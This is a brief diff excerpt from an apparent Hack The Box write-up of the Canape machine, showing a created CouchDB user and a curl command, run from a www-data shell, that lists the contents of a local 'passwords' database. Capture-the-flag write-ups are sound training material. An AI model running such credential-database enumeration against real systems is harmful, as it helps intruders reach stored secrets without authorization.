s0ck37/s0ck37.github.io/_posts/2023-07-28-htb-writeup-canape.md

 [+] User s0ck37 with password s0ck37 successfully created.
 ```

-Now that we have new credentials we can enumerate the password database:
+Now that we have new credentials we can enumerate the `passwords` database:

 ```
 www-data@canape:/tmp$ curl -X GET http://s0ck37:s0ck37@localhost:5984/passwords/_all_docs